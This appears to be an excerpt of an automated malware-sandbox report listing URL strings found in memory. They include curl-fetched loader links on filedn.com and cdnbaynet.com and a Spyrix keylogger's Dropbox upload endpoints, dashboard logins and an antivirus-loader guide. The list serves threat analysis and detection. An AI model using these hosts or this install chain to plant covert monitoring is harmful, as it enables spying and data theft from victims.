Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1867203455.0000000002B38000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1859136273.0000000002B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://rc.qzone.qq.com/qzonesoso/?search
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum.pl/l3.cer0
Source: is-2HD8H.tmp.22.dr, is-4EDJE.tmp.22.dr	String found in binary or memory: http://schemas.mic
Source: is-VPREH.tmp.22.dr	String found in binary or memory: http://schemas.micr
Source: is-NOU64.tmp.22.dr	String found in binary or memory: http://schemas.microsof
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: spkl.exe	String found in binary or memory: http://spyrix.com/manual.php
Source: spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://user.qzone.qq.com
Source: spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://vk.com/search
Source: spkl.exe, 00000038.00000002.2750231481.0000000006A96000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://vk.com/searchecp
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.actualkeylogger.com/buynow.html
Source: spkl.exe	String found in binary or memory: http://www.actualkeylogger.com/help.html
Source: spkl.exe	String found in binary or memory: http://www.actualkeylogger.com/help.html#registrate
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.actualkeylogger.com/help.html#registratehttp://www.spyrix.com/manual.php#registrateU
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.actualkeylogger.com/help.htmlhttp://spyrix.com/manual.phpU
Source: [space]= .exe, 00000013.00000003.1870585486.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.2474200016.0000000001FB8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003200000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.dk-soft.org/
Source: spkl.exe, spkl.exe, 00000038.00000002.2673755823.0000000000863000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000038.00000002.2742570837.0000000004541000.00000004.00001000.00020000.00000000.sdmp, spmm.exe, 0000004D.00000000.2580594653.0000000000401000.00000020.00000001.01000000.00000018.sdmp, spmm.exe, 0000004D.00000002.2678280868.00000000022B1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: spkl.exe	String found in binary or memory: http://www.indyproject.org/Original
Source: [space]= .exe, 00000013.00000003.1872221233.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.1871453618.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000000.1873347361.0000000000401000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.jrsoftware.org/0
Source: [space]= .exe, 00000013.00000000.1870033970.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.myspace.com/my/mail
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.myspace.com/search/
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ok.ru/dk?st.cmd=searchResult
Source: [space]= .exe, 00000013.00000003.1872221233.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.1871453618.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000000.1873347361.0000000000401000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.spyrix.com
Source: [space]= .exe, 00000013.00000003.1870585486.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.2474200016.000000000205E000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003200000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2455460766.0000000003280000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2457362812.0000000003432000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/
Source: spkl.exe	String found in binary or memory: http://www.spyrix.com/manual.php#registrate
Source: spkl.exe, 00000038.00000002.2691175840.00000000009EA000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2422306843.0000000004591000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/osticket/upload/open.php
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.spyrix.com/pro_upgrade.htm?lic=
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp, is-SDGI4.tmp.22.dr, is-2HD8H.tmp.22.dr, is-4EDJE.tmp.22.dr	String found in binary or memory: http://www.spyrix.com/purchase.php
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2454626435.0000000000775000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/terms-of-use.php)
Source: spkl.exe, 00000038.00000003.2422306843.00000000044CC000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2691175840.0000000000915000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.spyrix.net/ibann
Source: spmm.exe, 0000004D.00000002.2690989523.0000000061E9E000.00000008.00000001.01000000.00000015.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/token
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/chunked_upload
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/chunked_upload?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/commit_chunked_upload
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files/dropbox
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files/sandbox
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files_put
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files_put?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/account/info
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/account/info?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/delta
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/delta?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/copy
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/copy?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/create_folder
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/create_folder?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/delete
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/delete?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/move
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/move?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/metadata/dropbox
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/metadata/sandbox
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/access_token
Source: spkl.exe	String found in binary or memory: https://api.dropbox.com/1/oauth/access_token?
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/access_token?SV
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/request_token
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/request_token?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/shares/dropbox
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/shares/sandbox
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://cdn.cdndownload.net/proxy/list.json
Source: curl.exe, 0000000E.00000002.1613915870.0000000002D30000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1613960897.0000000002D44000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1614035419.0000000002D79000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1613409560.0000000002D40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1613488405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: cmd.exe, 0000000A.00000003.1598991147.00000000007F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk&A
Source: curl.exe, 0000000E.00000002.1613915870.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk77
Source: cmd.exe, 0000000A.00000003.1614181304.00000000007F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk8A
Source: curl.exe, 0000000E.00000002.1613960897.0000000002D44000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1613409560.0000000002D40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1613488405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkE=E3
Source: curl.exe, 0000000E.00000002.1613915870.0000000002D30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkU
Source: cmd.exe, 0000000A.00000003.1598991147.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1613915870.0000000002D30000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1613844777.0000000002B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0
Source: cmd.exe, 0000000A.00000003.1598991147.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1613915870.0000000002D30000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1613844777.0000000002B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.exe
Source: spkl.exe, 00000038.00000002.2753080685.00000000075E0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2756912357.00000000077BD000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2726762987.0000000001811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: qrl.exe, 00000047.00000000.2538418999.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606859968.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579493629.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000002.2655442094.00000000006BA000.00000008.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/P
Source: qrl.exe, 00000047.00000000.2538418999.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606859968.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579493629.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000002.2655442094.00000000006BA000.00000008.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
Source: qrl.exe, qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: qrl.exe	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
Source: qrl.exe, qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/docs/sslcerts.html
Source: qrl.exe	String found in binary or memory: https://curl.haxx.se/docs/sslcerts.htmlcurl
Source: qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/libcurl/c/curl_easy_setopt.html
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://dashboard.actualkeylogger.com
Source: spkl.exe	String found in binary or memory: https://dashboard.actualkeylogger.com/account/login-from-program
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://dashboard.actualkeylogger.com/account/login-from-programspsMapspsJSON
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://dashboard.clevercontrol.com/account/user-hash-gen
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://dashboard.spyrix.com
Source: spkl.exe, 00000038.00000002.2742570837.000000000455D000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2742570837.00000000044E6000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2755859416.0000000007720000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/
Source: spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/.spyrix.com/qqS
Source: spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/6s
Source: spkl.exe, 00000038.00000002.2750231481.0000000006A70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/;ce
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://dashboard.spyrix.com/account/login-from-program
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/account/login-from-program?email=
Source: spkl.exe, 00000038.00000002.2742570837.00000000044E6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/ix.com/
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com
Source: curl.exe, 00000006.00000002.1549010969.000001CE89170000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.1549010969.000001CE89178000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.1549010969.000001CE89188000.00000004.00000020.00020000.00000000.sdmp, D0WmCTD2qO.bat	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
Source: curl.exe, 00000006.00000002.1549010969.000001CE89170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404Winsta0
Source: curl.exe, 00000006.00000002.1549010969.000001CE89170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404curl.exe
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp, [space]= .exe.6.dr	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s6
Source: svchost.exe, 00000008.00000003.1559425141.00000274054E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000008.00000003.1559425141.0000027405470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: [space]= .exe.6.dr	String found in binary or memory: https://securcdn.com/loader/link.php?prg_id=sfkupowershell.exe
Source: [space]= .exe, 00000013.00000003.1870585486.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.2474200016.000000000205E000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003200000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2455460766.0000000003280000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2455460766.0000000003307000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step1
Source: [space]= .exe, 00000013.00000003.1870585486.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.2474200016.000000000205E000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003200000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2455460766.0000000003280000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2455460766.0000000003307000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step18
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step2
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://spyrix.net/Uwas771wvshs7916gjqg62417/core.php
Source: spkl.exe, 00000038.00000003.2605309079.00000000001E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/das
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/av
